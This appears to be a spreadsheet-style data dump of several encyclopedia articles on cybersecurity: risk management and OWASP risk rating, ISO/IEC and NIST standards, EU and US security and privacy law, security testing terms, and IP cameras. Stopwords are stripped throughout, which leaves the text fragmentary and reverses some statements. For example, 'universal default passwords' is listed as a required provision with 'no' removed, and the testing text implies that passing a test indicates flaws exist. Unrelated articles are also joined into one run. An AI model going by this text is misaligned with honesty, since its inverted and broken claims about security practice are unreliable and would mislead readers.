level, risks managed categorically. front line departments noc's tend measure discrete, individual risks. managing nexus role modern ciso's. when measuring risk kind, selecting correct equation given threat, asset, available data important step. doing subject unto itself, common components risk equations helpful understand. there four fundamental forces involved risk management, also apply cybersecurity. they assets, impact, threats, likelihood. internal knowledge fair amount control assets, tangible intangible things value. also control impact, refers loss damage asset. however, threats represent adversaries methods attack external control. likelihood wild card bunch. likelihoods determine threat materialize, succeed, damage. while never fully control, likelihoods shaped influenced manage risk. mathematically, forces represented formula {\textstyle risk=p(asset,threat)\times d(asset,threat)} likelihood threat materialize/succeed asset, likelihood various levels damage occur. field risk management spawned number terms techniques unique industry. some industry terms reconciled. example, term vulnerability often used interchangeably likelihood occurrence, problematic. often encountered risk management terms techniques include: information security event identified occurrence system, service network state indicating possible breach information security policy failure safeguards, previously unknown situation security relevant. occurrence particular circumstancesthe event certain uncertain. event single occurrence series occurrences. :(iso/iec guide 73)information security incident indicated single series unwanted information security events significant probability compromising business operations threatening information security event [g.11] assessed actual potentially adverse effect security performance system. impact result unwanted incident [g.17].(iso/iec pdtr 13335-1) consequence outcome event [g.11] there consequence event. consequences range positive negative. consequences expressed qualitatively quantitatively (iso/iec guide 73)the risk product likelihood security incident occurring times impact incurred organization incident, ithe likelihood security incident occurrence function likelihood threat appears likelihood threat successfully exploit relevant system vulnerabilities. consequence occurrence security incident function likely impact incident organization result harm organization assets sustain. harm related value assets organization; asset different values different organizations. function four factors: value assets likelihood threat nature vulnerability i.e. likelihood exploited (proportional potential benefit attacker inversely proportional cost exploitation) likely impact, extent harmif numerical values (money impact probabilities factors), risk expressed monetary terms compared cost countermeasures residual risk applying security control. always practical express values, first step risk evaluation, risk graded dimensionless three five steps scales. owasp proposes practical risk measurement guideline based estimation likelihood mean different factors scale: threat agent factors skill level: technically skilled group threat agents? technical skills (1), technical skills (3), advanced computer user (4), network programming skills (6), security penetration skills motive: motivated group threat agents find exploit vulnerability? reward (1), possible reward (4), high reward opportunity: what resources opportunity required group threat agents find exploit vulnerability? full access expensive resources required (0), special access resources required (4), access resources required (7), access resources required size: large group threat agents? developers (2), system administrators (2), intranet users (4), partners (5), authenticated users (6), anonymous internet users vulnerability factors: next factors related vulnerability involved. goal estimate likelihood particular vulnerability involved discovered exploited. assume threat agent selected above. ease discovery: easy group threat agents discover vulnerability? practically impossible (1), difficult (3), easy (7), automated tools available ease exploit: easy group threat agents actually exploit vulnerability? theoretical (1), difficult (3), easy (5), automated tools available awareness: well known vulnerability group threat agents? unknown (1), hidden (4), obvious (6), public knowledge intrusion detection: likely exploit detected? active detection application (1), logged reviewed (3), logged without review (8), logged estimation impact mean different factors scale technical impact factors; technical impact broken factors aligned traditional security areas concern: confidentiality, integrity, availability, accountability. goal estimate magnitude impact system vulnerability exploited. loss confidentiality: much data could disclosed sensitive minimal non-sensitive data disclosed (2), minimal critical data disclosed (6), extensive non-sensitive data disclosed (6), extensive critical data disclosed (7), data disclosed loss integrity: much data could corrupted damaged minimal slightly corrupt data (1), minimal seriously corrupt data (3), extensive slightly corrupt data (5), extensive seriously corrupt data (7), data totally corrupt loss availability much service could lost vital minimal secondary services interrupted (1), minimal primary services interrupted (5), extensive secondary services interrupted (5), extensive primary services interrupted (7), services completely lost loss accountability: threat agents' actions traceable individual? fully traceable (1), possibly traceable (7), completely anonymous business impact factors: business impact stems technical impact, requires deep understanding important company running application. general, aiming support risks business impact, particularly audience executive level. business risk justifies investment fixing security problems. financial damage: much financial damage result exploit? less cost vulnerability (1), minor effect annual profit (3), significant effect annual profit (7), bankruptcy reputation damage: would exploit result reputation damage would harm business? minimal damage (1), loss major accounts (4), loss goodwill (5), brand damage non-compliance: much exposure non-compliance introduce? minor violation (2), clear violation (5), high-profile violation privacy violation: much personally identifiable information could disclosed? individual (3), hundreds people (5), thousands people (7), millions people business impact calculated accurately following otherwise technical impact rate likelihood impact low, medium, high scale assuming less low, less medium, high. calculate risk using following table risk management risk management considered component wider enterprise risk management system.the establishment, maintenance continuous update information security management system (isms) provide strong indication company using systematic approach identification, assessment management information security risks.different methodologies proposed manage risks, divided processes steps.the certified information systems auditor review manual 2006 produced isaca, international professional association focused governance, provides following definition risk management: "risk management process identifying vulnerabilities threats information resources used organization achieving business objectives, deciding countermeasures, any, take reducing risk acceptable level, based value information resource organization."the nist cybersecurity framework encourages organizations manage risk part identify (id) function:risk assessment (id.ra): organization understands cybersecurity risk organizational operations (including mission, functions, image, reputation), organizational assets, individuals. id.ra-1: asset vulnerabilities identified documented id.ra-2: cyber threat intelligence vulnerability information received information sharing forums source id.ra-3: threats, internal external, identified documented id.ra-4: potential business impacts likelihoods identified id.ra-5: threats, vulnerabilities, likelihoods, impacts used determine risk id.ra-6: risk responses identified prioritizedrisk management strategy (id.rm): organization’s priorities, constraints, risk tolerances, assumptions established used support operational risk decisions. id.rm-1: risk management processes established, managed, agreed organizational stakeholders id.rm-2: organizational risk tolerance determined clearly expressed id.rm-3: organization’s determination risk tolerance informed role critical infrastructure sector specific risk analysis risk laws regulations following brief description applicable rules organized source. oecd oecd issued following: organisation economic co-operation development (oecd) recommendation council concerning guidelines governing protection privacy trans-border flows personal data september 1980) oecd guidelines security information systems networks: towards culture security july 2002). topic: general information security. scope: binding guidelines oecd entities (governments, businesses, organisations individual users develop, own, provide, manage, service, information systems networks). oecd guidelines state basic principles underpinning risk management information security practices. while part text binding such, non-compliance principles indicative serious breach rm/ra good practices potentially incur liability. european union european union issued following, divided topic: privacy regulation (ec) 45/2001 protection individuals regard processing personal data community institutions bodies free movement data provide internal regulation, practical application principles privacy directive described below. furthermore, article regulation requires community institutions bodies take similar precautions regard telecommunications infrastructure, properly inform users specific risks security breaches. directive 95/46/ec protection individuals regard processing personal data free movement data require personal data processing activity undergoes prior risk analysis order determine privacy implications activity, determine appropriate legal, technical organisation measures protect activities;is effectively protected measures, must state keeping account sensitivity privacy implications activity (including third party charged processing task) notified national data protection authority, including measures taken ensure security activity. furthermore, article following directive requires member states transfer personal data non-member states, unless countries provided adequate legal protection personal data, barring certain exceptions. commission decision 2001/497/ec june 2001 standard contractual clauses transfer personal data third countries, directive 95/46/ec; commission decision 2004/915/ec december 2004 amending decision 2001/497/ec regards introduction alternative standard contractual clauses transfer personal data third countries. topic: export personal data third countries, specifically non-e.u. countries recognised data protection level adequate (i.e. equivalent e.u.). both commission decisions provide voluntary model clauses used export personal data data controller (who subject e.u. data protection rules) data processor outside e.u. subject rules similar adequate rules. international safe harbor privacy principles (see international safe harbor privacy principles directive 2002/58/ec july 2002 concerning processing personal data protection privacy electronic communications sector national security directive 2006/24/ec march 2006 retention data generated processed connection provision publicly available electronic communications services public communications networks amending directive 2002/58/ec (‘data retention directive’). topic: requirement providers public electronic telecommunications service providers retain certain information purposes investigation, detection prosecution serious crime council directive 2008/114/ec december 2008 identification designation european critical infrastructures assessment need improve protection. topic: identification protection european critical infrastructures. scope: applicable member states operators european critical infrastructure (defined draft directive ‘critical infrastructures disruption destruction would significantly affect member states, single member state critical infrastructure located another member state. this includes effects resulting cross-sector dependencies types infrastructure’). requires member states identify critical infrastructures territories, designate ecis. following designation, owners/operators ecis required create operator security plans (osps), establish relevant security solutions protection civil penal council framework decision 2005/222/jha february 2005 attacks information systems. topic: general decision aiming harmonise national provisions field cyber crime, encompassing material criminal (i.e. definitions specific crimes), procedural criminal (including investigative measures international cooperation) liability issues. scope: requires member states implement provisions framework decision national legal frameworks. framework decision relevant rm/ra contains conditions legal liability imposed legal entities conduct certain natural persons authority within legal entity. thus, framework decision requires conduct figures within organisation adequately monitored, also decision states legal entity held liable acts omission regard. council europe council europe convention cybercrime, budapest, 23.xi.2001, european treaty series-no. 185. topic: general treaty aiming harmonise national provisions field cyber crime, encompassing material criminal (i.e. definitions specific crimes), procedural criminal (including investigative measures international cooperation), liability issues data retention. apart definitions series criminal offences articles convention relevant rm/ra states conditions legal liability imposed legal entities conduct certain natural persons authority within legal entity. thus, convention requires conduct figures within organisation adequately monitored, also convention states legal entity held liable acts omission regard. united states united states issued following, divided topic: civil penal amendments federal rules civil procedure regard electronic discovery. topic: u.s. federal rules regard production electronic documents civil proceedings. discovery rules allow party civil proceedings demand opposing party produce relevant documentation defined requesting party) possession, allow parties court correctly assess matter. through e-discovery amendment, entered force december 2006, information include electronic information. this implies party brought u.s. court civil proceedings asked produce documents, includes finalised reports, working documents, internal memos e-mails regard specific subject, specifically delineated. party whose activities imply risk involved proceedings must therefore take adequate precautions management information, including secure storage. specifically: party must capable initiating ‘litigation hold’, technical/organisational measure must ensure relevant information modified longer way. storage policies must responsible: deletion specific information course remains allowed part general information management policies (‘routine, good-faith operation information system’, rule (f)), wilful destruction potentially relevant information punished extremely high fines specific case billion us$). thus, practice, businesses risk civil litigation u.s. courts must implement adequate information management policies, must implement necessary measures initiate litigation hold. privacy california consumer privacy (ccpa) california privacy rights (cpra) gramm–leach–bliley (glba) patriot act, title health insurance portability accountability (hipaa) from rm/ra perspective, particularly known provisions regard administrative simplification (title hipaa). this title required u.s. department health human services (hhs) draft specific rule sets, would provide specific standards would improve efficiency health care system prevent abuse. result, adopted five principal rules: privacy rule, transactions code sets rule, unique identifiers rule, enforcement rule, security rule. latter, published federal register february 2003 (see: http://www.cms.hhs.gov/securitystandard/downloads/securityfinalrule.pdf), specifically relevant, specifies series administrative, technical, physical security procedures assure confidentiality electronic protected health information. these aspects outlined security standards administrative, physical, organisational technical safeguards, published, along guidance document basics hipaa risk management risk assessment &lt;http://www.cms.hhs.gov/educationmaterials/04_securitymaterials.asp&gt;. european countries health care service providers generally affected hipaa obligations active u.s. market. however, since data processing activities subject similar obligations general european (including privacy directive), since underlying trends modernisation evolution towards electronic health files same, safeguards useful initial yardstick measuring rm/ra strategies place european health care service providers, specifically regard processing electronic health information. hipaa security standards include following: administrative safeguards: security management process assigned security responsibility workforce security information access management security awareness training security incident procedures contingency plan evaluation business associate contracts other arrangements physical safeguards facility access controls workstation workstation security device media controls technical safeguards access control audit controls integrity person entity authentication transmission security organisational requirements business associate contracts other arrangements requirements group health plans international safe harbor privacy principles issued department commerce july 2000 export personal data data controller subject e.u. privacy regulations u.s. based destination; personal data exported entity subject e.u. privacy regulations destination subject u.s. law, european entity must ensure receiving entity provides adequate safeguards protect data number mishaps. complying obligation require receiving entity join safe harbor, requiring entity self-certifies compliance so-called safe harbor principles. road chosen, data controller exporting data must verify u.s. destination indeed safe harbor list (see safe harbor list) united states department homeland security also utilizes privacy impact assessment (pia) decision making tool identify mitigate risks privacy violations. sarbanes–oxley fisma legislation evolves, increased focus require 'reasonable security' information management. ccpa states "manufacturers connected devices equip device reasonable security." york's shield requires organizations manage residents' information “develop, implement maintain reasonable safeguards protect security, confidentiality integrity private information including, limited disposal data.” this concept influence businesses manage risk management plan compliance requirements develop. standards organizations standards international standard bodies: international organization standardization payment card industry security standards council information security forum open group united states standard bodies: national institute standards technology nist federal information processing standards fips nist devoted federal government agencies standard bodies british standard institute short description standards list chiefly based iso/iec 13335-1:2004 information technology—security techniques—management information communications technology security—part concepts models information communications technology security management http://www.iso.org/iso/en/cataloguedetailpage.cataloguedetail?csnumber=39066. standard containing generally accepted descriptions concepts models information communications technology security management. standard commonly used code practice, serves resource implementation security management practices yardstick auditing practices. (see also http://csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf) iso/iec 15443-1:2005 information technology—security techniques—a framework security assurance reference:http://www.iso.org/iso/en/cataloguedetailpage.cataloguedetail?csnumber=39733 (note: reference page standard acquired. however, standard free charge, provisions publicly available. reason, specific provisions cannot quoted). topic: security assurance technical report (tr) contains generally accepted guidelines used determine appropriate assurance method assessing security service, product environmental factor iso/iec 15816:2002 information technology—security techniques—security information objects access control reference:http://www.iso.org/iso/en/cataloguedetailpage.cataloguedetail?csnumber=29139 (note: reference page standard acquired. however, standard free charge, provisions publicly available. reason, specific provisions cannot quoted). topic: security management access control. standard allows security professionals rely specific syntactic definitions explanations regard sios, thus avoiding duplication divergence standardisation efforts. iso/iec 15947:2002 information technology—security techniques—it intrusion detection framework reference:http://www.iso.org/iso/en/cataloguedetailpage.cataloguedetail?csnumber=29580 (note: reference page standard acquired. however, standard free charge, provisions publicly available. reason, specific provisions cannot quoted). topic: security management intrusion detection systems. standard allows security professionals rely specific concepts methodologies describing assessing security risks regard potential intrusions systems. contain rm/ra obligations such, rather tool facilitating rm/ra activities affected field. iso/iec 15408-1/2/3:2005 information technology security techniques evaluation criteria security part introduction general model (15408-1) part security functional requirements (15408-2) part security assurance requirements (15408-3) reference: http://isotc.iso.org/livelink/livelink/fetch/2000/2489/ittf_home/publiclyavailablestandards.htm topic: standard containing common requirements security functions products systems assurance measures applied security evaluation. scope: publicly available standard, voluntarily implemented. text resource evaluation security products systems, thus used tool rm/ra. standard commonly used resource evaluation security products systems; including specifically) procurement decisions regard products. standard thus used rm/ra tool determine security product system design, manufacturing marketing, procuring iso/iec 17799:2005 information technology—security techniques—code practice information security management. reference: http://www.iso.org/iso/en/cataloguedetailpage.cataloguedetail?csnumber=39612&amp;ics1=35&amp;ics2=40&amp;ics3= (note: reference page standard acquired. however, standard free charge, provisions publicly available. reason, specific provisions cannot quoted). topic: standard containing generally accepted guidelines general principles initiating, implementing, maintaining, improving information security management organization, including business continuity management. standard commonly used code practice, serves resource implementation information security management practices yardstick auditing practices. (see also iso/iec 17799) iso/iec 15446:2004 information technology—security techniques—guide production protection profiles security targets. reference: http://isotc.iso.org/livelink/livelink/fetch/2000/2489/ittf_home/publiclyavailablestandards.htm topic: technical report (tr) containing guidelines construction protection profiles (pps) security targets (sts) intended compliant iso/iec 15408 (the "common criteria"). standard predominantly used tool security professionals develop sts, also used assess validity using yardstick determine standards obeyed). thus, (nonbinding) normative tool creation assessment rm/ra practices. iso/iec 18028:2006 information technology—security techniques—it network security reference: http://www.iso.org/iso/en/cataloguedetailpage.cataloguedetail?csnumber=40008 (note: reference page standard acquired. however, standard free charge, provisions publicly available. reason, specific provisions cannot quoted). topic: five part standard (iso/iec 18028-1 18028-5) containing generally accepted guidelines security aspects management, operation information technology networks. standard considered extension guidelines provided iso/iec 13335 iso/iec 17799 focusing specifically network security risks. standard commonly used code practice, serves resource implementation security management practices yardstick auditing practices. iso/iec 27001:2005 information technology—security techniques—information security management systems—requirements reference: http://www.iso.org/iso/en/cataloguedetailpage.cataloguedetail?csnumber=42103 (note: reference page standard acquired. however, standard free charge, provisions publicly available. reason, specific provisions cannot quoted). topic: standard containing generally accepted guidelines implementation information security management system within given organisation. scope: publicly available standard, voluntarily implemented. while legally binding, text contains direct guidelines creation sound information security practices standard commonly used code practice, serves resource implementation information security management systems yardstick auditing systems and/or surrounding practices. application practice often combined related standards, 7799-3:2006 provides additional guidance support requirements given iso/iec 27001:2005 &lt;http://www.bsiglobal.com/en/shop/publication-detail/?pid=000000000030125022&amp;recid=2491&gt; iso/iec 27001:2013, updated standard information security management systems. iso/iec 18044:2004 information technology—security techniques—information security incident management reference: http://www.iso.org/iso/en/cataloguedetailpage.cataloguedetail?csnumber=35396 (note: reference page standard acquired. however, standard free charge, provisions publicly available. reason, specific provisions cannot quoted). topic: technical report (tr) containing generally accepted guidelines general principles information security incident management organization.scope: publicly available voluntarily used.while legally binding, text contains direct guidelines incident management. standard high level resource introducing basic concepts considerations field incident response. such, mostly useful catalyst awareness raising initiatives regard. iso/iec 18045:2005 information technology—security techniques—methodology security evaluation reference: http://isotc.iso.org/livelink/livelink/fetch/2000/2489/ittf_home/publiclyavailablestandards.htm topic: standard containing auditing guidelines assessment compliance iso/iec 15408 (information technology—security techniques—evaluation criteria security) scope publicly available standard, followed evaluating compliance iso/iec 15408 (information technology—security techniques—evaluation criteria security). standard ‘companion document’, thus primarily used security professionals involved evaluating compliance iso/iec 15408 (information technology—security techniques—evaluation criteria security). since describes minimum actions performed auditors, compliance iso/iec 15408 impossible iso/iec 18045 disregarded. iso/tr 13569:2005 financial services—information security guidelines reference: http://www.iso.org/iso/en/cataloguedetailpage.cataloguedetail?csnumber=37245 (note: reference page standard acquired. however, standard free charge, provisions publicly available. reason, specific provisions cannot quoted). topic: standard containing guidelines implementation assessment information security policies financial services institutions. standard commonly referenced guideline, serves resource implementation information security management programmes institutions financial sector, yardstick auditing programmes. (see also http://csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf) iso/iec 21827:2008 information technology—security techniques—systems security engineering—capability maturity model (sse-cmm): iso/iec 21827:2008 specifies systems security engineering capability maturity model (sse-cmm), describes essential characteristics organization's security engineering process must exist ensure good security engineering. iso/iec 21827:2008 prescribe particular process sequence, captures practices generally observed industry. model standard metric security engineering practices. 25999-1:2006 business contin</t>
  </si>
  <si>
    <t>IT security standards</t>
  </si>
  <si>
    <t>security standards cyber security standards techniques generally outlined published materials attempt protect cyber environment user organization. this environment includes users themselves, networks, devices, software, processes, information storage transit, applications, services, systems connected directly indirectly networks. principal objective reduce risks, including preventing mitigating cyber-attacks. these published materials consist tools, policies, security concepts, security safeguards, guidelines, risk management approaches, actions, training, best practices, assurance technologies. history cybersecurity standards existed several decades users providers collaborated many domestic international forums effect necessary capabilities, policies, practices generally emerging work stanford consortium research information security policy 1990s.a 2016 security framework adoption study reported surveyed organizations nist cybersecurity framework popular best practice information technology (it) computer security, many note requires significant investment. cross-border, cyber-exfiltration operations enforcement agencies counter international criminal activities dark raise complex jurisdictional questions remain, extent, unanswered. tensions domestic enforcement efforts conduct cross-border cyber-exfiltration operations international jurisdiction likely continue provide improved cybersecurity norms. international standards subsections detail international standards related cybersecurity. iso/iec 27001 27002 iso/iec 27001, part growing iso/iec 27000 family standards, information security management system (isms) standard, last revision published october 2013 international organization standardization (iso) international electrotechnical commission (iec). full name iso/iec 27001:2013 information technology security techniques information security management systems requirements. iso/iec 27001 formally specifies management system intended bring information security explicit management control. iso/iec 27002 incorporates part 7799 good security management practice standard. latest version 7799 7799-3. sometimes iso/iec 27002 therefore referred 17799 7799 part and, sometimes refers part part 7799 part provides outline good practice guide cybersecurity management; whereas 7799 part iso/iec 27001 normative therefore provide framework certification. iso/iec 27002 high-level guide cybersecurity. beneficial explanatory guidance management organisation obtain certification iso/iec 27001 standard. certification obtained lasts three years. depending auditing organisation, intermediate audits carried three years. iso/iec 27001 (isms) replaces 7799 part since backwards compatible organization working toward 7799 part easily transition iso/iec 27001 certification process. there also transitional audit available make easier organization 7799 part 2-certified organization become iso/iec 27001-certified. iso/iec 27002 provides best practice recommendations information security management responsible initiating, implementing maintaining information security management systems (isms). states information security systems required implement iso/iec 27002 control objectives. without iso/iec 27001, iso/iec 27002 control objectives ineffective. iso/iec 27002 controls objectives incorporated 27001 annex iso/iec 21827 (sse-cmm iso/iec 21827) international standard based systems security engineering capability maturity model (sse-cmm) measure maturity controls objectives. iso/iec 15408 this standard develops called “common criteria”. allows many different software hardware products integrated tested secure way. 62443 62443 cybersecurity standard defines processes, techniques requirements industrial automation control systems (iacs). documents result standards creation process national committees involved agree upon common standard. 62443 standards technical reports organized four general categories called general, policies procedures, system component. first category includes foundational information concepts, models terminology. second category work products targets asset owner. these address various aspects creating maintaining effective iacs security program. third category includes work products describe system design guidelines requirements secure integration control systems. core zone conduit, design model. fourth category includes work products describe specific product development technical requirements control system products. iso/sae 21434 iso/sae 21434 "road vehicles cybersecurity engineering" cybersecurity standard jointly developed working groups. proposes cybersecurity measures development lifecycle road vehicles. standard published august 2021.the standard related european union (eu) regulation cyber security currently developed. coordination unece developing certification "cyber security management system" (csms), mandatory type approval vehicles. iso/sae 21434 technical standard automotive development demonstrate compliance regulations. derivative work unece wp29, provides regulations vehicle cybersecurity software updates. etsi etsi standard provides baseline requirements security consumer internet things (iot) devices. contains technical controls organizational policies developers manufacturers internet-connected consumer devices. standard released june 2020 intended complemented other, specific standards. many consumer devices handle personally identifiable information (pii), implementing standard helps complying general data protection regulation (gdpr) eu.the cybersecurity provisions european standard are: universal default passwords implement means manage reports vulnerabilities keep software updated securely store sensitive security parameters communicate securely minimize exposed attack surfaces ensure software integrity ensure personal data secure make systems resilient outages examine system telemetry data make easy users delete user data make installation maintenance devices easy validate input dataconformance assessment baseline requirements standard 701, allows self-certification, certification another group. national standards subsections detail national standards frameworks related cybersecurity. nerc initial attempt create information security standards electrical power industry created nerc 2003 known nerc (cyber security standards). subsequent guidelines, nerc evolved enhanced requirements. widely recognized modern nerc security standard nerc 1300, modification/update nerc 1200. newest version nerc 1300 called cip-002-3 cip-009-3 (cip=critical infrastructure protection). these standards used secure bulk electric systems although nerc created standards within areas. bulk electric system standards also provide network security administration still supporting best-practice industry processes.[1] nist nist cybersecurity framework (nist csf) "provides high level taxonomy cybersecurity outcomes methodology assess manage outcomes." intended help private sector organizations provide critical infrastructure guidance protect along relevant protections privacy civil liberties. special publication 800-12 provides broad overview computer security control areas. also emphasizes importance security controls ways implement them. initially, document aimed federal government although practices document applied private sector well. specifically, written people federal government responsible handling sensitive systems. special publication 800-14 describes common security principles used. provides high-level description incorporated within computer security policy. describes done improve existing security well develop security practice. eight principles fourteen practices described within document. special publication 800-26 provides advice manage security. superseded nist 800-53 rev3. this document emphasizes importance self-assessments well risk assessments. special publication 800-37, updated 2010 provides risk approach: "guide applying risk management framework federal information systems" special publication 800-53 rev4, "security privacy controls federal information systems organizations", published april 2013 updated include updates january 2014, specifically addresses security controls applied system make "more secure". special publication 800-63-3, "digital identity guidelines", published june 2017 updated include updates december 2017, provides guidelines implementing digital identity services, including identity proofing, registration, authentication users. special publication 800-82, revision "guide industrial control system (ics) security", revised 2015, describes secure multiple types industrial control systems cyber-attacks considering performance, reliability safety requirements specific ics. fips series federal information processing standards (fips) u.s. government computer security standards specify requirements cryptography modules. both fips 140-2 fips 140-3 accepted current active. cyber essentials cyber essentials united kingdom government information assurance scheme operated national cyber security centre (ncsc). encourages organizations adopt good practice information security. cyber essentials also includes assurance framework simple security controls protect information threats coming internet. it-grundschutz federal office information security (german: bundesamt sicherheit informationstechnik, abbreviated bsi) standards elementary component baseline protection (german: it-grundschutz) methodology. they contain recommendations methods, processes procedures well approaches measures various aspects information security. users public authorities companies well manufacturers service providers standards make business processes data secure. standard 100-4 covers business continuity management (bcm). standard 200-1 defines general requirements information security management system (isms). compatible 27001 considers recommendations standards 27002. standard 200-2 forms basis bsi's methodology establishing sound information security management system (isms). establishes three procedures implementing baseline protection. standard 200-3 bundles risk-related steps implementation baseline protection. industry-specific standards subsections detail cybersecurity standards frameworks related specific industries. payment card industry data security standard (pci dss) information security standard organizations handle branded credit cards major card schemes. standard mandated card brands administered payment card industry security standards council. standard created increase controls around cardholder data reduce credit card fraud. 2900 2900 series standards published standards include general cybersecurity requirements 2900-1) well specific requirements medical products 2900-2-1), industrial systems 2900-2-2), security life safety signalling systems 2900-2-3). 2900 requires manufacturers described documented attack surface technologies used products. requires threat modeling based intended deployment environment. standard requires implementation effective security measures protect sensitive (personal) data well assets command control data. also requires security vulnerabilities software eliminated, security principles defence-in-depth followed, security software verified penetration testing. also chief information security officer computer security control system security information security information assurance notes references department homeland security, comparison cyber security standards developed segment. (november 2004) guttman, swanson, national institute standards technology; technology administration; u.s. department commerce., generally accepted principles practices securing information technology systems (800–14). (september 1996) national institute standards technology; technology administration; u.s. department commerce., introduction computer security: nist handbook, special publication 800-12. swanson, national institute standards technology; technology administration; u.s. department commerce., security self-assessment guide information technology systems (800–26). grassi, garcia, fenton, j.;national institute standards technology; u.s. department commerce., digital identity guidelines (800-63-3). stouffer, pillitteri, lightman, abrams, hahn, national institute standards technology; u.s. department commerce., guide industrial control systems (ics) security (800–82). north american electric reliability council (nerc). http://www.nerc.com. retrieved november 2005. federal financial institutions examination council (ffiec). https://www.ffiec.gov. retrieved april 2018. external links cyber security 27001 information security nerc standards presentation professor william sanders, university illinois global cybersecurity policy conference minute guide nist cybersecurity framework federal financial institutions examination council's (ffiec) site critical security controls</t>
  </si>
  <si>
    <t>Security testing</t>
  </si>
  <si>
    <t>security testing process intended reveal flaws security mechanisms information system protect data maintain functionality intended. logical limitations security testing, passing security testing process indication flaws exist system adequately satisfies security requirements. typical security requirements include specific elements confidentiality, integrity, authentication, availability, authorization non-repudiation. actual security requirements tested depend security requirements implemented system. security testing term number different meanings completed number different ways. such, security taxonomy helps understand different approaches meanings providing base level work from. confidentiality security measure protects disclosure information parties intended recipient means ensuring security. integrity integrity information refers protecting information modified unauthorized parties measure intended allow receiver determine information provided system correct. integrity schemes often underlying technologies confidentiality schemes, usually involve adding information communication, form basis algorithmic check, rather encoding communication. check correct information transferred application other. authentication this might involve confirming identity person, tracing origins artifact, ensuring product packaging labelling claims assuring computer program trusted one. authorization process determining requester allowed receive service perform operation. access control example authorization. availability assuring information communications services ready expected. information must kept available authorized persons need non-repudiation reference digital security, non-repudiation means ensure transferred message sent received parties claiming sent received message. non-repudiation guarantee sender message cannot later deny sent message recipient cannot deny received message. sender-id usually header transmitted along message recognises message source. taxonomy common terms used delivery security testing: discovery purpose stage identify systems within scope services use. intended discover vulnerabilities, version detection highlight deprecated versions software firmware thus indicate potential vulnerabilities. vulnerability scan following discovery stage looks known security issues using automated tools match conditions known vulnerabilities. reported risk level automatically tool manual verification interpretation test vendor. this supplemented credential based scanning looks remove common false positives using supplied credentials authenticate service (such local windows accounts). vulnerability assessment this uses discovery vulnerability scanning identify security vulnerabilities places findings context environment test. example would removing common false positives report deciding risk levels applied report finding improve business understanding context. security assessment builds upon vulnerability assessment adding manual verification confirm exposure, include exploitation vulnerabilities gain access. verification could form authorized access system confirm system settings involve examining logs, system responses, error messages, codes, etc. security assessment looking gain broad coverage systems test depth exposure specific vulnerability could lead penetration test penetration test simulates attack malicious party. building previous stages involves exploitation found vulnerabilities gain access. using approach result understanding ability attacker gain access confidential information, affect data integrity availability service respective impact. each test approached using consistent complete methodology allows tester problem solving abilities, output range tools knowledge networking systems find vulnerabilities would/ could identified automated tools. this approach looks depth attack compared security assessment approach looks broader coverage. security audit driven audit risk function look specific control compliance issue. characterized narrow scope, type engagement could make earlier approaches discussed (vulnerability assessment, security assessment, penetration test). security review verification industry internal security standards applied system components product. this typically completed analysis utilizes build code reviews reviewing design documents architecture diagrams. this activity utilize earlier approaches (vulnerability assessment, security assessment, penetration test, security audit) tools container infrastructure security analysis sast static application security testing dast dynamic application security testing iast interactive application security testing data loss prevention ids, intrusion detection system, intrusion prevention system scanning open source software scanning (see open-source software security) rasp runtime application self-protection software composition analysis application firewall also national information assurance glossary references</t>
  </si>
  <si>
    <t>IP camera</t>
  </si>
  <si>
    <t>internet protocol camera, camera, type digital video camera receives control data sends image data network. they commonly used surveillance, but, unlike analog closed-circuit television (cctv) cameras, require local recording device, local area network. most cameras webcams, term camera netcam usually applies directly accessed network connection. some cameras require support central network video recorder (nvr) handle recording, video alarm management. others able operate decentralized manner needed, camera able record directly local remote storage media. first camera invented axis communications 1996. history first centralized camera, axis neteye 200, released 1996 axis communications. though promoted based direct accessibility anywhere internet connection, camera could stream real-time motion video. limited snapshot image time camera accessed lack powerful integrated circuits capable handling image processing networking. camera considered incapable operating motion camera enormous bandwidth requirements. thus, aimed primarily tourism industry. axis neteye intended replace traditional analogue cctv systems, given capability limited frame second common intermediate format (cif), frame every seconds 4cif resolution.the first decentralized camera released 1999 mobotix. camera's linux system contained video, alarm, recording management functions. 2005, first camera onboard video content analytics (vca) released intellio. this camera able detect number different events, object stolen, human crossed line, human entered predefined zone, moved wrong direction.with advancements cloud infrastructure, ring (owned amazon, u.s.), released first camera doorbell targeted home 2014. device offered quick setup, cloud based recording, motion detection. device retailed $199 usd. 2021, ring sold millions units. with success cameras, companies nest (owned google, u.s.) released similar cloud-based devices. standards previous generations analog cctv cameras established broadcast television formats (e.g. cif, ntsc, pal, secam). since 2000, shift consumer business towards high-definition (hd) resolutions (e.g. 1080p (full-hd), resolution (ultra-hd) 16:9 widescreen format).ip cameras differ another resolution, features, video encoding schemes, available network protocols, video management software.to address video surveillance standardization issues, industry groups formed 2008: open network video interface forum (onvif) physical security interoperability alliance (psia). psia founded member companies including honeywell, security, cisco. onvif founded axis communications, bosch sony. each group numerous additional members, thus cameras recording hardware operate standard compatible other. technology network cameras developed enterprise consumer use. consumer cameras used home security typically send live video companion user's device. they generally connect internet wi-fi ethernet cable. unlike consumer cameras, enterprise cameras often offer higher video resolution, video analytics, mostly accessed though http real time streaming protocol (rtsp). cameras used common businesses rather homes, longer case. 2016 survey 2,000 americans revealed owned home security cameras. this crossover cameras home partly device's self-installation. cameras typically require professional installation saving time home business owners. popular abilities consumer-level home security cameras view footage mobile app. many cameras offer features wide-angle lens, low-light night vision capabilities, motion detection. most developed send notifications application motion detected. video clips stored local device micro-sd card cloud service.the market size home security systems reached $4.8 billion 2018. compound annual growth rate 22.4% 2011 2018. people countries suffer high crime rates, particularly robbery theft, keen adopt home security cameras. china high implementation rate residential security cameras.major players home security market nest (owned google, u.s.), ring (owned amazon, u.s.), arlo (owned netgear, u.s.). alarm security industry players (u.s.), vivint (u.s.), simplisafe (u.s.). largest camera manufactures hikvision digital technology (china), axis communications (sweden), dahua (china) camera types depending functionality, cameras classified fixed camera pan–tilt–zoom camera (ptz camera). fixed cameras generally used monitor fixed area, whereas camera used either track motion manually adjust monitoring area. cameras designed indoor outdoor use. outdoor cameras often rated ip65/ip67 order withstand outdoor conditions. cameras offer variety digital imaging technologies multi-sensor cameras, panoramic cameras, thermal imaging cameras. cloud local storage some camera manufacturers offer cloud subscriptions users remotely view download recent video clips paying recurring subscription fees. cloud subscription plans typically come several days looping storage, videos overwritten beyond duration.some cameras include micro card slot users store videos locally. most cameras programmed overwrite video storage medium full. accessing video camera normally done direct network connection device. considerations potential benefits previous generation cameras transmitted analog video signals. cameras send images digitally using transmission security features tcp/ip protocol. advantages approach include: two-way audio single network cable allows users listen speak subject 